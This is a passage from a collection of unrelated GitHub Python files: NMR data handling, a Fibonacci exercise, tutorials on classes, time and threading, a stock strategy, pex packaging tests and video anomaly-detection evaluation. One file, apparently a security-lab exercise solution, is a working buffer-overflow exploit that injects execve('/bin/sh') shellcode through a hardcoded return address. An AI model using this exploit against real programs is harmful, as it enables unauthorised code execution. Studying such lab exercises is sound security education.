self.dic[\"acqus\"][\"P\"][19],\\\n self.dic[\"acqus\"][\"P\"][18],\\\n self.dic[\"acqus\"][\"P\"][17]\n print('That did not work. Your data is from an old spectrometer!')\n # calculating usable parameters\n self.delta = self._p17+self._p18\n self._Delta_1 = 0.001*(self._p17*2+self._p18)+(self._d2+self._d9+self._d5+self._d11)*1000+0.001*self.p1+self._d11\n self._Delta_2 = 0.001*(self._p17*2+self._p18)+(self._d2+self._d9+self._d5+self._d11)*1000+0.001*self.p1*2\n self._spoiler = (self._d11+self._p17+self._p19+self._p17)*0.001+self._d2*1000\n self.Delta = self._Delta_1+self._Delta_2+2*self._spoiler\n self.Delta *=1e-3\n self.delta *=1e-6\n \n\n # Elektrodenabstand in m\n self.d = electrode_distance\n self.g = self.eNMRraw[\"g in T/m\"][0]\n \n def __add__(self, other):\n \n for obj in [self, other]:\n for k in obj.eNMRraw.columns:\n if k[:2] == 'ph':\n obj.eNMRraw[k] -= obj.eNMRraw.loc[0, k]\n print('%s normalized to 0V'%k)\n else:\n pass\n self.eNMRraw = self.eNMRraw.append(other.eNMRraw)\n self.eNMRraw.sort_values('U / [V]', inplace=True)\n return self\n","repo_name":"Flackermann/eNMRpy","sub_path":"eNMRpy/Measurement/Emma.py","file_name":"Emma.py","file_ext":"py","file_size_in_byte":8656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29478718489","text":"des = \"\"\"\nThe Fibonacci numbers, commonly denoted F(n) form a sequence, called the\nFibonacci sequence, such that each number is the sum of the two preceding ones,\n starting from 0 and 1. That is,\nF(0) = 0, F(1) = 1\nF(n) = F(n - 1) + F(n - 2), for n > 1.\nGiven n, calculate F(n).\nInput: n = 2\nOutput: 1\nExplanation: F(2) = F(1) + F(0) = 1 + 0 = 1.\nInput: n = 3\nOutput: 2\nExplanation: F(3) = F(2) + F(1) = 1 + 1 = 2.\nInput: n = 4\nOutput: 3\nExplanation: F(4) = F(3) + F(2) = 2 + 1 = 3.\nConstraints:\n0 <= n <= 30\n\"\"\"\n\n\nclass Solution:\n def fib(self, n: int) -> int:\n return self.fib_with_memo(n, {})\n\n def fib_with_memo(self, n: int, memo: dict) -> int:\n if n == 0:\n return 0\n if n == 1:\n return 1\n\n if n in memo:\n return memo[n]\n\n result = self.fib_with_memo(n-1, memo) + self.fib_with_memo(n-2, memo)\n memo[n] = result\n\n return result\n\n\n# completed\n","repo_name":"Sic4Parvis9Magna/leetcode-practice","sub_path":"april_2021/fib_memo.py","file_name":"fib_memo.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13363770527","text":"#Python Object-Oriented Programming: Classes and Instances\n\nclass Employee:\n\n num_of_emps = 0\n raise_amount = 1.04\n\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' + last + '@company.com'\n\n Employee.num_of_emps +=1\n\n @property\n def fullname(self):\n return '{} {}'.format(self.first, self.last)\n \n def apply_raise(self):\n self.pay = int(self.pay * self.raise_amount)\n\n\n\n \ndev_1 = Employee('Aerish', 'Aryal', 750000)\ndev_2 = Employee('Test', 'User', 500000)\n\n\n\n\nprint(dev_1.pay)\ndev_1.apply_raise()\nprint(dev_1.pay)\n\n\n\n\n\n","repo_name":"Aerish369/Hello-world","sub_path":"OOP in py/oop1.py","file_name":"oop1.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74005588625","text":"import polars as pl\r\nfrom mysystem.strategy import Strategy\r\nclass MyStrategy(Strategy):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n self.klines = pl.DataFrame()\r\n self.kline_num = 50\r\n self.signals = {}\r\n self.stk_num = 3577\r\n self.stk_pool = []\r\n self.trade_period = 1\r\n\r\n def on_init(self, stk_ids):\r\n self.stk_pool = stk_ids[2800:3000]\r\n self.stk_num = len(self.stk_pool)\r\n self.kline_num = 30*self.stk_num\r\n self.trade_period = 2\r\n\r\n def on_day(self, day_data, stk_hold):\r\n in_data = day_data.filter(pl.col('stk_id').is_in(self.stk_pool))\r\n if self.klines.shape[0]<self.kline_num:\r\n self.klines = self.klines.vstack(in_data)\r\n return [], []\r\n self.calculate_signal()\r\n self.klines = self.klines.vstack(in_data)\r\n self.klines = self.klines[self.stk_num:, :]\r\n return self.on_buy_in(), self.on_sold_out(stk_hold)\r\n \r\n def calculate_signal(self):\r\n gb = self.klines.group_by('stk_id', maintain_order=True)\r\n self.signals.clear()\r\n for stk_id,df in gb:\r\n df = df.with_columns(\r\n (pl.col('close')*pl.col('cumadj')/pl.col('cumadj').max()).alias('p')\r\n )\r\n \r\n df = df.with_columns(\r\n pl.col('p').rolling_mean(21).alias('ma5')\r\n )\r\n \r\n self.signals[stk_id] = df['ma5'].tail(1).to_list()[0] - df['p'].tail(1).to_list()[0]\r\n return\r\n \r\n \r\n def on_buy_in(self):\r\n t = sorted(self.signals.items(), key=lambda x:x[1], reverse=True)\r\n #print(t)\r\n return [(id, 0.04) for id,s in t[:5]]\r\n \r\n def on_sold_out(self, stk_hold):\r\n return [id for id,s in self.signals.items() if s<=0.005]\r\n \r\n def __name__(self):\r\n return '5DR' \r\n","repo_name":"leafDancer/backtest-sysetem","sub_path":"strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9198170956","text":"# Time Module\r\nimport datetime\r\nnow = datetime.datetime.now()\r\nprint(\"current date and time\")\r\nprint(now)\r\n# dictionary comprehension\r\n# dictionary = {key: expression for (key,value) in iterables}\r\n# dictionary = {key: expression for (key,value) in iterables if condition}\r\n# dictionary = {key: (if/else) for (key,value) in iterables if condition}\r\n# dictionary = {key: function_value for (key,value) in iterables if condition}\r\nimport time\r\n\r\n\r\n\r\ncities_F = {'lahore':90,'karachi':150,'peshawar': 130}\r\ncities_C = {key: round((value-32)*(5/9)) for (key,value) in cities_F.items()}\r\ncities_C = {key: round((value-32)*(5/9)) for (key,value) in cities_F.items() if value == 130}\r\ncities_C = {key: (\"Warm\" if value >= 100 else \"Moderate\") for (key,value) in cities_F.items()}\r\nprint(cities_C)\r\n# zip(* iterables)\r\n\r\nusername = [\"bro\",\"Sam\",\"code\"]\r\npasswords = (\"p@ssword\",\"abc123\",\"guest\")\r\n\r\nusers =dict(zip(username,passwords))\r\n\r\nprint(type(users))\r\n\r\nfor key,value in users.items():\r\n print(key+\" : \"+value)\r\nimport time\r\nprint(time.ctime(1000000))\r\n\r\nprint(time.time())\r\n\r\nprint(time.ctime(time.time()))\r\n\r\ntime_object = time.localtime()\r\nprint(time_object)\r\nlocal_time = time.strftime(\"%B %d %Y %H:%M:%S\", time_object)\r\nprint(local_time)\r\n\r\ntime_string = '''20 April, 2023'''\r\ntime_object = time.strptime(time_string,'''%d %B, %Y''')\r\nprint(time_object)\r\n\r\ntime_tuple = (2023, 6, 7, 4, 31, 0, 0, 0, 0)\r\ntime_string = time.asctime(time_tuple)\r\n# time_string = time.mktime(time_tuple) #for second\r\nprint(time_string)\r\n\r\nimport threading\r\nimport time\r\n\r\ndef eat_breakfast():\r\n time.sleep(3)\r\n print(\"you eat breakfast\")\r\n\r\ndef drink_coffee():\r\n time.sleep(4)\r\n print(\"you drink coffee\")\r\n\r\ndef study():\r\n time.sleep(5)\r\n print(\"You finish study \")\r\n\r\nx = threading.Thread(target =eat_breakfast, args=())\r\nx.start()\r\n\r\ny = threading.Thread(target=drink_coffee, args=())\r\ny.start()\r\n\r\nz = threading.Thread(target=study, args=())\r\nz.start()\r\n\r\nx.join()\r\ny.join()\r\nz.join()\r\n\r\n#\r\neat_breakfast()\r\ndrink_coffee()\r\nstudy()\r\n\r\nprint(threading.active_count())\r\nprint(threading.enumerate()) # enumerate function is used to print the list while running the thread\r\nprint(time.perf_counter())\r\nimport threading\r\nimport time\r\n\r\n\r\ndef timer():\r\n print()\r\n print()\r\n count = 0\r\n while True:\r\n time.sleep(1)\r\n count += 1\r\n print(\"logged in for: \",count, \"seconds\")\r\n\r\n\r\nx = threading.Thread(target=timer, daemon=True)\r\nx.start()\r\n\r\n\r\nanswer = input(\"Do you wish to exit?\")\r\n#__________________________\r\n # Python multiprocessing\r\n# *********************************\r\n# multiprocessing = running tasks in parallel on different cpu cores, bypasses GIL used for threading\r\n# multiprocessing = better for cpu bound tasks (heavy cpu usage)\r\n# multithreading = better for io bound tasks (waiting around)\r\n\r\nfrom multiprocessing import Process, cpu_count\r\nimport time\r\n\r\n\r\ndef counter(num):\r\n count = 0\r\n while count < num:\r\n count += 1\r\n\r\n\r\ndef main():\r\n\r\n print(\"cpu count:\", cpu_count())\r\n\r\n a = Process(target=counter, args=(100000000,))\r\n # b = Process(target=counter, args=(500000000,))\r\n\r\n a.start()\r\n # b.start()\r\n\r\n print(\"processing...\")\r\n\r\n a.join()\r\n # b.join()\r\n\r\n print(\"Done!\")\r\n print(\"finished in:\", time.perf_counter(), \"seconds\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"SaiemWaseem/demopygit","sub_path":"Time_Module.py","file_name":"Time_Module.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6054688071","text":"import os\nimport stat\nimport subprocess\nimport sys\nfrom textwrap import dedent\n\nfrom twitter.common.contextutil import pushd\n\nfrom pex.common import open_zip\nfrom pex.testing import temporary_content\n\n\ndef assert_entry_points(entry_points):\n setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='my_app',\n version='0.0.0',\n zip_safe=True,\n packages=[''],\n entry_points=%(entry_points)r,\n )\n \"\"\" % dict(entry_points=entry_points))\n\n my_app = dedent(\"\"\"\n def do_something():\n print(\"hello world!\")\n \"\"\")\n\n with temporary_content({'setup.py': setup_py, 'my_app.py': my_app}) as project_dir:\n with pushd(project_dir):\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_pex'])\n process = subprocess.Popen([os.path.join(project_dir, 'dist', 'my_app-0.0.0.pex')],\n stdout=subprocess.PIPE)\n stdout, _ = process.communicate()\n assert '{pex_root}' not in os.listdir(project_dir)\n assert 0 == process.returncode\n assert stdout == b'hello world!\\n'\n\n\ndef assert_pex_args_shebang(shebang):\n setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='my_app',\n version='0.0.0',\n zip_safe=True,\n packages=[''],\n )\n \"\"\")\n\n with temporary_content({'setup.py': setup_py}) as project_dir:\n with pushd(project_dir):\n assert subprocess.check_call(\n [sys.executable, 'setup.py', 'bdist_pex',\n '--pex-args=--python-shebang=\"%(shebang)s\"' %\n dict(shebang=shebang)]) == 0\n\n with open(os.path.join(project_dir, 'dist',\n 'my_app-0.0.0.pex'), 'rb') as fp:\n assert fp.readline().decode().rstrip() == shebang\n\n\ndef test_entry_points_dict():\n assert_entry_points({'console_scripts': ['my_app = my_app:do_something']})\n\n\ndef test_entry_points_ini_string():\n assert_entry_points(dedent(\"\"\"\n [console_scripts]\n my_app=my_app:do_something\n \"\"\"))\n\n\ndef test_pex_args_shebang_with_spaces():\n assert_pex_args_shebang('#!/usr/bin/env python')\n\n\ndef test_pex_args_shebang_without_spaces():\n assert_pex_args_shebang('#!/usr/bin/python')\n\n\ndef test_unwriteable_contents():\n my_app_setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='my_app',\n version='0.0.0',\n zip_safe=True,\n packages=['my_app'],\n include_package_data=True,\n package_data={'my_app': ['unwriteable.so']},\n )\n \"\"\")\n\n UNWRITEABLE_PERMS = 0o400\n with temporary_content({'setup.py': my_app_setup_py,\n 'my_app/__init__.py': '',\n 'my_app/unwriteable.so': ''},\n perms=UNWRITEABLE_PERMS) as my_app_project_dir:\n with pushd(my_app_project_dir):\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel'])\n\n uses_my_app_setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='uses_my_app',\n version='0.0.0',\n zip_safe=True,\n install_requires=['my_app'],\n )\n \"\"\")\n with temporary_content({'setup.py': uses_my_app_setup_py}) as uses_my_app_project_dir:\n with pushd(uses_my_app_project_dir):\n subprocess.check_call([sys.executable,\n 'setup.py',\n 'bdist_pex',\n '--pex-args=--disable-cache --no-pypi -f {}'\n .format(os.path.join(my_app_project_dir, 'dist'))])\n\n with open_zip('dist/uses_my_app-0.0.0.pex') as zf:\n unwriteable_sos = [path for path in zf.namelist()\n if path.endswith('my_app/unwriteable.so')]\n assert 1 == len(unwriteable_sos)\n unwriteable_so = unwriteable_sos.pop()\n zf.extract(unwriteable_so)\n assert UNWRITEABLE_PERMS == stat.S_IMODE(os.stat(unwriteable_so).st_mode)\n","repo_name":"peterdemin/pex","sub_path":"tests/test_bdist_pex.py","file_name":"test_bdist_pex.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"6680059267","text":"import numpy as np\nimport scipy.io as scio\nimport os\nimport argparse\nimport pickle\nfrom sklearn import metrics\nimport json\nimport socket\nimport matplotlib.pyplot as plt\n\n# config\nDATA_DIR = '/p300/dataset' # const.data_dir_gt, dataset_root_dir\n\n#\nNORMALIZE = True \nnum_his = 4 \nDECIDABLE_IDX = num_his\n\n\nclass RecordResult(object):\n def __init__(self, fpr=None, tpr=None, auc=-np.inf, dataset=None, loss_file=None, lam_rgb_fea_comm=None, lam_smooth=None):\n self.fpr = fpr\n self.tpr = tpr\n self.auc = auc\n self.dataset = dataset\n self.loss_file = loss_file\n self.lam_rgb_fea_comm = lam_rgb_fea_comm\n self.lam_smooth = lam_smooth\n\n def __lt__(self, other):\n return self.auc < other.auc\n\n def __gt__(self, other):\n return self.auc > other.auc\n\n def __str__(self):\n return 'dataset = {}, loss file = {}, auc = {}, lam_rgb_fea_comm={}, ' \\\n 'lam_smooth={}'.format(self.dataset, self.loss_file, self.auc, self.lam_rgb_fea_comm, self.lam_smooth)\n\n\nclass GroundTruthLoader(object):\n AVENUE = 'avenue'\n PED1 = 'ped1'\n PED1_PIXEL_SUBSET = 'ped1_pixel_subset'\n PED2 = 'ped2'\n ENTRANCE = 'enter'\n EXIT = 'exit'\n SHANGHAITECH = 'shanghaitech'\n SHANGHAITECH_LABEL_PATH = os.path.join(DATA_DIR, 'shanghaitech/testing/test_frame_mask')\n TOY_DATA = 'toydata'\n TOY_DATA_LABEL_PATH = os.path.join(DATA_DIR, TOY_DATA, 'toydata.json')\n\n NAME_MAT_MAPPING = {\n AVENUE: os.path.join(DATA_DIR, 'avenue/avenue.mat'),\n PED1: os.path.join(DATA_DIR, 'ped1/ped1.mat'),\n PED2: os.path.join(DATA_DIR, 'ped2/ped2.mat'),\n ENTRANCE: os.path.join(DATA_DIR, 'enter/enter.mat'),\n EXIT: os.path.join(DATA_DIR, 'exit/exit.mat')\n }\n\n NAME_FRAMES_MAPPING = {\n AVENUE: os.path.join(DATA_DIR, 'avenue/testing/frames'),\n PED1: os.path.join(DATA_DIR, 'ped1/testing/frames'),\n PED2: os.path.join(DATA_DIR, 'ped2/testing/frames'),\n ENTRANCE: os.path.join(DATA_DIR, 'enter/testing/frames'),\n EXIT: os.path.join(DATA_DIR, 'exit/testing/frames')\n }\n\n def __init__(self, mapping_json=None):\n \"\"\"\n Initial a ground truth loader, which loads the ground truth with given dataset name.\n\n :param mapping_json: the mapping from dataset name to the path of ground truth.\n \"\"\"\n\n if mapping_json is not None:\n with open(mapping_json, 'rb') as json_file:\n self.mapping = json.load(json_file)\n else:\n self.mapping = GroundTruthLoader.NAME_MAT_MAPPING\n\n def __call__(self, dataset):\n \"\"\" get the ground truth by provided the name of dataset.\n\n :type dataset: str\n :param dataset: the name of dataset.\n :return: np.ndarray, shape(#video)\n np.array[0] contains all the start frame and end frame of abnormal events of video 0,\n and its shape is (#frapsnr, )\n \"\"\"\n\n if dataset == GroundTruthLoader.SHANGHAITECH:\n gt = self.__load_shanghaitech_gt()\n elif dataset == GroundTruthLoader.TOY_DATA:\n gt = self.__load_toydata_gt()\n else:\n gt = self.__load_ucsd_avenue_subway_gt(dataset)\n return gt\n\n def __load_ucsd_avenue_subway_gt(self, dataset):\n assert dataset in self.mapping, 'there is no dataset named {} \\n Please check {}' \\\n .format(dataset, GroundTruthLoader.NAME_MAT_MAPPING.keys())\n\n mat_file = self.mapping[dataset]\n abnormal_events = scio.loadmat(mat_file, squeeze_me=True)['gt']\n\n if abnormal_events.ndim == 2:\n abnormal_events = abnormal_events.reshape(-1, abnormal_events.shape[0], abnormal_events.shape[1])\n\n num_video = abnormal_events.shape[0]\n dataset_video_folder = GroundTruthLoader.NAME_FRAMES_MAPPING[dataset]\n video_list = os.listdir(dataset_video_folder)\n video_list.sort()\n\n assert num_video == len(video_list), 'ground true does not match the number of testing videos. {} != {}' \\\n .format(num_video, len(video_list))\n\n # get the total frames of sub video\n def get_video_length(sub_video_number):\n # video_name = video_name_template.format(sub_video_number)\n video_name = os.path.join(dataset_video_folder, video_list[sub_video_number])\n assert os.path.isdir(video_name), '{} is not directory!'.format(video_name)\n\n length = len(os.listdir(video_name))\n\n return length\n\n # need to test [].append, or np.array().append(), which one is faster\n gt = []\n for i in range(num_video):\n length = get_video_length(i)\n\n sub_video_gt = np.zeros((length,), dtype=np.int8)\n sub_abnormal_events = abnormal_events[i]\n if sub_abnormal_events.ndim == 1:\n sub_abnormal_events = sub_abnormal_events.reshape((sub_abnormal_events.shape[0], -1))\n\n _, num_abnormal = sub_abnormal_events.shape\n\n for j in range(num_abnormal):\n # (start - 1, end - 1)\n start = sub_abnormal_events[0, j] - 1\n end = sub_abnormal_events[1, j]\n\n sub_video_gt[start: end] = 1\n\n gt.append(sub_video_gt)\n\n return gt\n\n @staticmethod\n def __load_shanghaitech_gt():\n video_path_list = os.listdir(GroundTruthLoader.SHANGHAITECH_LABEL_PATH)\n video_path_list.sort()\n\n gt = []\n for video in video_path_list:\n # print(os.path.join(GroundTruthLoader.SHANGHAITECH_LABEL_PATH, video))\n gt.append(np.load(os.path.join(GroundTruthLoader.SHANGHAITECH_LABEL_PATH, video)))\n\n return gt\n\n @staticmethod\n def __load_toydata_gt():\n with open(GroundTruthLoader.TOY_DATA_LABEL_PATH, 'r') as gt_file:\n gt_dict = json.load(gt_file)\n\n gt = []\n for video, video_info in gt_dict.items():\n length = video_info['length']\n video_gt = np.zeros((length,), dtype=np.uint8)\n sub_gt = np.array(np.matrix(video_info['gt']))\n\n for anomaly in sub_gt:\n start = anomaly[0]\n end = anomaly[1] + 1\n video_gt[start: end] = 1\n gt.append(video_gt)\n return gt\n\n @staticmethod\n def get_pixel_masks_file_list(dataset):\n # pixel mask folder\n pixel_mask_folder = os.path.join(DATA_DIR, dataset, 'pixel_masks')\n pixel_mask_file_list = os.listdir(pixel_mask_folder)\n pixel_mask_file_list.sort()\n\n # get all testing videos\n dataset_video_folder = GroundTruthLoader.NAME_FRAMES_MAPPING[dataset]\n video_list = os.listdir(dataset_video_folder)\n video_list.sort()\n\n # get all testing video names with pixel masks\n pixel_video_ids = []\n ids = 0\n for pixel_mask_name in pixel_mask_file_list:\n while ids < len(video_list):\n if video_list[ids] + '.npy' == pixel_mask_name:\n pixel_video_ids.append(ids)\n ids += 1\n break\n else:\n ids += 1\n\n assert len(pixel_video_ids) == len(pixel_mask_file_list)\n\n for i in range(len(pixel_mask_file_list)):\n pixel_mask_file_list[i] = os.path.join(pixel_mask_folder, pixel_mask_file_list[i])\n\n return pixel_mask_file_list, pixel_video_ids\n\n\ndef load_psnr(loss_file):\n \"\"\"\n load image psnr or optical flow psnr.\n :param loss_file: loss file path\n :return:\n \"\"\"\n with open(loss_file, 'rb') as reader:\n # results {\n # 'dataset': the name of dataset\n # 'psnr': the psnr of each testing videos,\n # }\n\n # psnr_records['psnr'] is np.array, shape(#videos)\n # psnr_records[0] is np.array ------> 01.avi\n # psnr_records[1] is np.array ------> 02.avi\n # ......\n # psnr_records[n] is np.array ------> xx.avi\n\n results = pickle.load(reader)\n psnrs = results['psnr']\n return psnrs\n\n\ndef load_psnr_gt(loss_file):\n try:\n with open(loss_file, 'rb') as reader:\n results = pickle.load(reader)\n # results {\n # 'dataset': the name of dataset\n # 'psnr': the psnr of each testing videos,\n # }\n\n # psnr_records['psnr'] is np.array, shape(#videos)\n # psnr_records[0] is np.array ------> 01.avi\n # psnr_records[1] is np.array ------> 02.avi\n # ......\n # psnr_records[n] is np.array ------> xx.avi\n\n dataset = results['dataset']\n psnr_records = results['psnr']\n\n num_videos = len(psnr_records)\n\n # load ground truth\n gt_loader = GroundTruthLoader()\n gt = gt_loader(dataset=dataset)\n\n assert num_videos == len(gt), 'the number of saved videos does not match the ground truth, {} != {}' \\\n .format(num_videos, len(gt))\n\n return dataset, psnr_records, gt\n except EOFError:\n return None, None, None\n\n\ndef get_scores_labels(loss_file):\n # the name of dataset, loss, and ground truth\n dataset, psnr_records, gt = load_psnr_gt(loss_file=loss_file)\n\n # the number of videos\n num_videos = len(psnr_records)\n\n scores = np.array([], dtype=np.float32)\n labels = np.array([], dtype=np.int8)\n # video normalization\n for i in range(num_videos):\n distance = psnr_records[i]\n\n if NORMALIZE:\n distance -= distance.min() # distances = (distance - min) / (max - min)\n distance /= distance.max()\n # distance = 1 - distance\n\n scores = np.concatenate((scores[:], distance[DECIDABLE_IDX:]), axis=0)\n labels = np.concatenate((labels[:], gt[i][DECIDABLE_IDX:]), axis=0)\n return dataset, scores, labels\n\n\ndef precision_recall_auc(loss_file):\n if not os.path.isdir(loss_file):\n loss_file_list = [loss_file]\n else:\n loss_file_list = os.listdir(loss_file)\n loss_file_list = [os.path.join(loss_file, sub_loss_file) for sub_loss_file in loss_file_list]\n\n optimal_results = RecordResult()\n for sub_loss_file in loss_file_list:\n dataset, scores, labels = get_scores_labels(sub_loss_file)\n precision, recall, thresholds = metrics.precision_recall_curve(labels, scores, pos_label=0)\n auc = metrics.auc(recall, precision)\n\n results = RecordResult(recall, precision, auc, dataset, sub_loss_file)\n\n if optimal_results < results:\n optimal_results = results\n\n if os.path.isdir(loss_file):\n print(results)\n print('##### optimal result and model = {}'.format(optimal_results))\n return optimal_results\n\n\ndef cal_eer(fpr, tpr):\n # makes fpr + tpr = 1\n eer = fpr[np.nanargmin(np.absolute((fpr + tpr - 1)))]\n return eer\n\n\ndef compute_eer(loss_file):\n if not os.path.isdir(loss_file):\n loss_file_list = [loss_file]\n else:\n loss_file_list = os.listdir(loss_file)\n loss_file_list = [os.path.join(loss_file, sub_loss_file) for sub_loss_file in loss_file_list]\n\n optimal_results = RecordResult(auc=np.inf)\n for sub_loss_file in loss_file_list:\n dataset, scores, labels = get_scores_labels(sub_loss_file)\n fpr, tpr, thresholds = metrics.roc_curve(labels, scores, pos_label=0)\n eer = cal_eer(fpr, tpr)\n\n results = RecordResult(fpr, tpr, eer, dataset, sub_loss_file)\n\n if optimal_results > results:\n optimal_results = results\n\n if os.path.isdir(loss_file):\n print(results)\n return optimal_results\n\n\ndef load_img_pred_fea_comm_gt(loss_file):\n try:\n with open(loss_file, 'rb') as reader:\n results = pickle.load(reader)\n # results {\n # 'dataset': the name of dataset\n # 'psnr': the psnr of each testing videos,\n # }\n\n # psnr_records['psnr'] is np.array, shape(#videos)\n # psnr_records[0] is np.array ------> 01.avi\n # psnr_records[1] is np.array ------> 02.avi\n # ......\n # psnr_records[n] is np.array ------> xx.avi\n\n dataset = results['dataset']\n\n rgb_img_pred_records = results['rgb_img_pred_records']\n rgb_fea_comm_records = results['rgb_fea_comm_records']\n op_img_pred_records = results['op_img_pred_records']\n op_fea_comm_records = results['op_fea_comm_records']\n\n num_videos = len(rgb_img_pred_records)\n\n # load ground truth\n gt_loader = GroundTruthLoader()\n gt = gt_loader(dataset=dataset)\n\n assert num_videos == len(gt), 'the number of saved videos does not match the ground truth, {} != {}' \\\n .format(num_videos, len(gt))\n\n return dataset, rgb_img_pred_records, rgb_fea_comm_records, \\\n op_img_pred_records, op_fea_comm_records, gt\n\n except EOFError:\n return None, None, None\n\n\ndef img_pred_fea_comm_single_auc(loss_file, lam=(0.5,0.5)):\n\n if not os.path.isdir(loss_file):\n loss_file_list = [loss_file]\n else:\n loss_file_list = os.listdir(loss_file)\n loss_file_list = [os.path.join(loss_file, sub_loss_file)\n for sub_loss_file in loss_file_list]\n optimal_results = RecordResult() \n\n for sub_loss_file in loss_file_list:\n dataset, rgb_img_pred_records, rgb_fea_comm_records, \\\n op_img_pred_records, op_fea_comm_records, gt = load_img_pred_fea_comm_gt(loss_file=sub_loss_file)\n\n if dataset is None:\n continue \n\n num_videos = len(rgb_img_pred_records)\n\n labels = np.array([], dtype=np.int8)\n for i in range(num_videos):\n labels = np.concatenate((labels, gt[i][DECIDABLE_IDX:]), axis=0)\n \n def norm_score(num_videos, records):\n scores = np.array([], dtype=np.float32)\n for i in range(num_videos):\n distance = records[i] # a sub_video loss_record\n if NORMALIZE:\n distance -= distance.min() # distances = (distance - min) / (max - min)\n distance /= distance.max()\n scores = np.concatenate((scores, distance[DECIDABLE_IDX:]), axis=0)\n if NORMALIZE: # whole video normalize\n scores -= scores.min() # scores = (scores - min) / (max - min)\n scores /= scores.max()\n\n return scores\n img_scores = norm_score(num_videos, rgb_img_pred_records) \n fea_scores = norm_score(num_videos, rgb_fea_comm_records) \n identity = np.ones_like(fea_scores)\n #\n lam_rgb_fea_comm_list = [x * 0.01 for x in range(0, 100)]\n lam_smooth_list = [x * 0.05 for x in range(0, 20)]\n\n lam_rgb_fea_comm, lam_smooth = lam[0], lam[1]\n scores = (1-lam_rgb_fea_comm) * img_scores + lam_rgb_fea_comm * (identity - fea_scores)\n scores = [(1-lam_smooth)*scores[idx-1]+lam_smooth*scores[idx] if idx>0 else scores[idx] for idx in range(len(scores))]\n fpr, tpr, thresholds = metrics.roc_curve(labels, scores, pos_label=0)\n auc = metrics.auc(fpr, tpr)\n results = RecordResult(fpr, tpr, auc, dataset, sub_loss_file, lam_rgb_fea_comm, lam_smooth)\n \n if optimal_results < results:\n optimal_results = results\n \n ret_dict = {}\n ret_dict[\"optimal_loss\"] = \"{}\".format(optimal_results.loss_file)\n ret_dict[\"auc\"] = round(optimal_results.auc,3)\n \n return ret_dict\n\n\neval_type_function = {\n 'compute_eer': compute_eer,\n 'precision_recall_auc': precision_recall_auc,\n 'img_pred_fea_comm_rgb_auc': img_pred_fea_comm_single_auc,\n}\n\n\ndef evaluate(eval_type, save_file, lam=None):\n assert eval_type in eval_type_function, 'there is no type of evaluation {}, please check {}' \\\n .format(eval_type, eval_type_function.keys())\n eval_func = eval_type_function[eval_type]\n optimal_results = eval_func(save_file, lam)\n return optimal_results\n","repo_name":"NjuHaoZhang/AMMCNet_AAAI2021","sub_path":"Code/main/eval_metric.py","file_name":"eval_metric.py","file_ext":"py","file_size_in_byte":16175,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"72296658707","text":"#!/usr/bin/python3\nimport sys\nimport subprocess\n\npath = '/home/kribas/Software-Security-Lab/bof-exercise-2/bof4'\ninfile = f'{path}/input2.txt'\nvuln = f'{path}/bof4'\n\n\nXOR_EAX_EAX= b'\\x31\\xc0' #2b\nXOR_EDX_EDX = b\"\\x31\\xd2\" #2b\nPUSH_EAX = b\"\\x50\" #1b\nPUSH_ARG_1 = b\"\\x68\\x2f\\x2f\\x73\\x68\" #5b\nPUSH_ARG_2 = b\"\\x68\\x2f\\x62\\x69\\x6e\" #5b\nMOV_EBX_ESP = b\"\\x89\\xe3\" #2b\nMOV_AL_0B = b\"\\xb0\\x0b\" #2b\nINT_80H = b\"\\xcd\\x80\" #2b\n\nSHELLCODE = XOR_EAX_EAX+\\\n XOR_EDX_EDX+\\\n PUSH_EAX+\\\n PUSH_ARG_1+\\\n PUSH_ARG_2+\\\n MOV_EBX_ESP+\\\n MOV_AL_0B+\\\n INT_80H\n\n\nbuff_len = 0x18\nwin_addr = b'\\x80\\xd3\\xff\\xff'\nbuffer = b'A'*buff_len +b'BBBB' + win_addr + SHELLCODE\n\nwith open(infile,'wb') as f:\n\tf.write(buffer)\n\tf.close()\n\nwith open(infile,'rb') as f:\n\tprog = subprocess.run(['/home/kribas/Software-Security-Lab/bof-exercise-2/bof4/bof4'],stdout=subprocess.PIPE,stdin=f)\n\tprint(prog.stdout)\n\tsys.stdout.buffer.write(prog.stdout)\n\tf.close()\n","repo_name":"Kr1bas/writeups","sub_path":"Software-Security-Lab/bof-exercise-2/bof4/solve2.py","file_name":"solve2.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43060165480","text":"import csv\nfrom pyBayes.MCMC_Core import MCMC_Diag\nfrom spatial_util.cov_functions import Matern\nfrom spatial_util.least_squares import sym_defpos_matrix_inversion_cholesky\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\npart2_inst = MCMC_Diag()\npart2_MC_sample = []\nwith open(\"hw4_fullbayes_samples_t1.csv\", newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in csv_reader:\n part2_MC_sample.append([float(x) for x in row])\nwith open(\"hw4_fullbayes_samples_t2.csv\", newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in csv_reader:\n part2_MC_sample.append([float(x) for x in 